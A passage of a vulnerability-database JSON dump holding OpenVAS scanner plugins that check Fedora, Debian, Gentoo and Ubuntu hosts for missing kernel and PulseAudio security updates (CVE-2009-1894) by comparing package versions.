isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064476", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64476\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:32", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064435", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64435\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:11", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64435", "href": "http://plugins.openvas.org/nasl.php?oid=64435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_id(64435);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:58", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory USN-804-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-804-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64445", "href": "http://plugins.openvas.org/nasl.php?oid=64445", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_804_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_804_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-804-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n pulseaudio 0.9.10-1ubuntu1.1\n\nUbuntu 8.10:\n pulseaudio 0.9.10-2ubuntu9.4\n\nUbuntu 9.04:\n pulseaudio 1:0.9.14-0ubuntu20.2\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-804-1\";\n\ntag_insight = \"Tavis Ormandy and Yorick Koster discovered that PulseAudio did not\nsafely re-execute itself. A local attacker could exploit this to gain\nroot privileges.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory USN-804-1.\";\n\n \n\n\nif(description)\n{\n script_id(64445);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-804-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-804-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = 